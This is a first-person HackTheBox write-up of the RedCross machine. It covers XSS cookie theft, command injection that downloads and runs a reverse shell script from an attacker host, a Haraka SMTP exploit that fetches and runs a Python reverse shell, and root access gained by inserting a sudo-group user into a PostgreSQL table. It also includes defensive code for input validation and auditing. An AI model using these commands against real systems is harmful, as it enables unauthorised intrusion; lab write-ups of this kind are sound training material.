RedCross from HackTheBox was like a maze, with several different paths to achieve shell and root. We'll start by enumerating a website and demonstrating two distinct techniques, SQL injection and XSS, for obtaining a cookie that can be used to access the admin panel. Then, using either an exploit in the Haraka SMTP server or an injection into a webpage and manipulation of the PostgreSQL database that manages the users in the ssh jail, we'll gain access to the box as Penelope. Finally, we'll demonstrate three different ways to escalate to root, two of which involve the database.
Initial Enumeration & Web Exploitation
I started with an Nmap scan using nmap -A <IP_ADDRESS> to identify open ports. This revealed that ports 22 (SSH), 80 (HTTP – Apache), and 443 (HTTPS – Apache) were open.
I then accessed the website intra.redcross.htb. I found a login box and a contact form. I performed directory brute-forcing using dirsearch -u <URL> -k -w <WORDLIST> (the -k flag is for SSL), which led me to a /documentation directory. I then ran another directory search specifically on /documentation for PDF files using dirsearch -u <URL>/documentation -e pdf -w <WORDLIST>, discovering an "account signup page" guide.
The documentation revealed that to request credentials, the subject should be "credentials" and the body should contain the username. I attempted to request admin credentials. I then explored Cross-Site Scripting (XSS) vulnerabilities in the contact form. The first two input boxes (subject and email) weren't vulnerable, but the third input box (contact phone) was. I used an XSS payload that made a request to my attacker's server carrying the admin's cookie, which stole it. I started a simple HTTP server (e.g., python -m SimpleHTTPServer 80) to receive the cookie. I then used the stolen admin cookie (PHP session ID) to impersonate the admin by modifying my browser's storage.
After logging in as admin, I immediately saw an SQL error, indicating an SQL injection vulnerability. I performed subdomain enumeration using wfuzz -c -w <WORDLIST> -H "Host: FUZZ.redcross.htb" --hw 28 <URL> (--hw 28 hides responses with a word count of 28), which discovered the subdomain admin.redcross.htb.
The admin panel had "User Management" and "Network Access" sections. The "Network Access" section allowed adding IP addresses to a whitelist, likely interacting with iptables. By intercepting the request to add/deny an IP using Burp Suite, I found a command injection vulnerability. I tested it by appending | ls to the IP address field when denying an IP. I obtained a reverse shell by injecting commands: first, downloading a shell script (| wget http://<ATTACKER_IP>:<PORT>/shell.sh -O /tmp/shell.sh) which contained a bash reverse shell, and then executing it (| bash /tmp/shell.sh). This resulted in a shell as the www-data user.
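The root cause of the "Network Access" injection is an address being spliced into a shell command string. The following is an added illustration, not the RedCross application's code: a hypothetical reconstruction of that flaw class next to a hardened version that validates the value as an IP literal and invokes iptables as an argv list with no shell. The sample address 10.10.14.5 is constructed.

```python
import ipaddress
import subprocess


# Hypothetical reconstruction of the flaw class (not the box's code): the
# submitted address is formatted into a shell string, so a value such as
# "10.10.14.5 | ls" makes the shell run "ls" as well.
def build_command_unsafe(action: str, ip: str) -> str:
    return f"iptables -A INPUT -s {ip} -j {action}"


def validate_ip(value: str) -> str:
    """Return the normalised address or raise ValueError.

    ipaddress.ip_address accepts only a bare IPv4/IPv6 literal, so pipes,
    semicolons, spaces and CIDR suffixes are all rejected before any
    command is built.
    """
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError as exc:
        raise ValueError(f"rejected address {value!r}") from exc


def build_command_safe(action: str, ip: str) -> list[str]:
    """Build the iptables invocation as an argv list; no shell parses it."""
    if action not in ("ACCEPT", "DROP"):
        raise ValueError(f"unexpected action {action!r}")
    return ["iptables", "-A", "INPUT", "-s", validate_ip(ip), "-j", action]


def apply_rule(action: str, ip: str, runner=subprocess.run):
    """Validate, then execute without shell=True (runner is injectable for tests)."""
    argv = build_command_safe(action, ip)
    return runner(argv, check=True)
```

Because the hardened path never reaches a shell, the only remaining attack surface is the iptables binary's own argument parsing, and the input it receives has already been constrained to a single address.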
Alternative Initial Access Methods (after whitelisting attacker IP)
After whitelisting my attacker’s IP, another Nmap scan revealed more open ports: 1025 (Haraka SMTP) and 5432 (PostgreSQL).
I explored Haraka SMTP exploitation. Connecting to port 1025 with nc <TARGET_IP> 1025 revealed a Haraka SMTP server. I found the Haraka version was vulnerable to RCE.
- Method 1: Metasploit: I used msfconsole, then search haraka type:exploit to find exploits. I used the haraka_smtp_command_injection module, setting LHOST, LPORT, RHOSTS, RPORT, EMAIL_FROM, and EMAIL_TO. This yielded a Meterpreter shell.
- Method 2: Manual Exploit: I downloaded the exploit script from Exploit Database, modified it to target port 1025, and ran it with a command to download and execute a Python reverse shell (python2 exploit.py -c "wget http://<ATTACKER_IP>/shell.py -O /dev/shm/shell.py; python /dev/shm/shell.py" -s <SENDER_EMAIL> -m <TARGET_IP>). The shell.py contained a Python reverse shell. This resulted in a shell as the penelope user.
Privilege Escalation via PostgreSQL
From the www-data shell (or the penelope shell), I interacted with the local PostgreSQL database. I found connection parameters (username: unix_manager, database: unix, password) in a configuration file (e.g., the actions file in the webroot). I connected to PostgreSQL using psql -h localhost -d unix -U unix_manager and entered the password. I listed tables with \dt and found a password table. Viewing its contents with SELECT * FROM password; showed the user trisha with a hashed password, UID, GID, and home directory.
To escalate privileges, I aimed to insert a new user into the password table with sudo privileges. I identified the GID of the sudo or sudoers group by checking /etc/group; the GID was 27. I then inserted a new user (e.g., sudo_xxx) with an MD5 hashed password and GID 27 into the password table using an SQL command like INSERT INTO password (username, password, uid, gid, homedir) VALUES ('sudo_xxx', '<MD5_HASH_OF_PASSWORD>', <UID>, 27, '/root');.
Finally, I gained root by SSHing into the machine as the newly created user (ssh sudo_xxx@<TARGET_IP>) with the chosen password and then escalating to root using sudo su.
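The password table is an identity store, so a defender would want to audit it for exactly the row described above: a user outside the known baseline, GID 27 (sudo), a home directory outside /home, or a legacy MD5-crypt hash. The following audit is an added example, not code from the box or the writeup; the row layout and the GID follow the text, while the sample rows, hashes and UIDs are constructed.

```python
import re
from collections import Counter
from dataclasses import dataclass

PRIVILEGED_GIDS = {0, 27}          # root, and sudo per /etc/group on this box
MD5_CRYPT = re.compile(r"^\$1\$")  # "$1$" prefix marks an MD5-crypt hash

# Equivalent check a DBA could schedule directly against the unix database
# (assumes the column names shown in the writeup's INSERT statement).
AUDIT_SQL = """
SELECT username, uid, gid, homedir FROM password
 WHERE uid = 0 OR gid IN (0, 27) OR homedir NOT LIKE '/home/%';
"""


@dataclass
class PasswordRow:
    username: str
    password: str
    uid: int
    gid: int
    homedir: str


def audit_password_table(rows, expected_users):
    """Return (username, reason) findings for rows that should not be there."""
    findings = []
    uid_counts = Counter(r.uid for r in rows)
    for r in rows:
        if r.username not in expected_users:
            findings.append((r.username, "not in baseline"))
        if r.uid == 0 or r.gid in PRIVILEGED_GIDS:
            findings.append((r.username, f"privileged uid/gid {r.uid}/{r.gid}"))
        if not r.homedir.startswith("/home/"):
            findings.append((r.username, f"homedir {r.homedir} outside /home"))
        if uid_counts[r.uid] > 1:
            findings.append((r.username, f"uid {r.uid} shared"))
        if MD5_CRYPT.match(r.password):
            findings.append((r.username, "MD5-crypt hash"))
    return findings


# Constructed sample rows modelled on the writeup; hashes and UIDs are fake.
SAMPLE_ROWS = [
    PasswordRow("trisha", "$1$constructed$constructedhash", 2017, 2017, "/home/trisha"),
    PasswordRow("sudo_xxx", "$1$constructed$constructedhash", 2018, 27, "/root"),
]
```

Running audit_password_table(SAMPLE_ROWS, {"trisha"}) flags the injected sudo_xxx row four times and trisha once, for the weak hash format alone.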
Technical Commands
Here are the technical commands I used:
nmap -A <IP_ADDRESS>
dirsearch -u <URL> -k -w <WORDLIST>
dirsearch -u <URL>/documentation -e pdf -w <WORDLIST>
python -m SimpleHTTPServer 80 (or similar for HTTP server)
wfuzz -c -w <WORDLIST> -H "Host: FUZZ.redcross.htb" --hw 28 <URL>
| ls (appended to IP in command injection test)
| wget http://<ATTACKER_IP>:<PORT>/shell.sh -O /tmp/shell.sh
| bash /tmp/shell.sh
nc <TARGET_IP> 1025
msfconsole
search haraka type:exploit
python2 exploit.py -c "wget http://<ATTACKER_IP>/shell.py -O /dev/shm/shell.py; python /dev/shm/shell.py" -s <SENDER_EMAIL> -m <TARGET_IP>
psql -h localhost -d unix -U unix_manager
\dt (in psql)
SELECT * FROM password; (in psql)
cat /etc/group
INSERT INTO password (username, password, uid, gid, homedir) VALUES ('sudo_xxx', '<MD5_HASH_OF_PASSWORD>', <UID>, 27, '/root'); (in psql)
ssh sudo_xxx@<TARGET_IP>
sudo su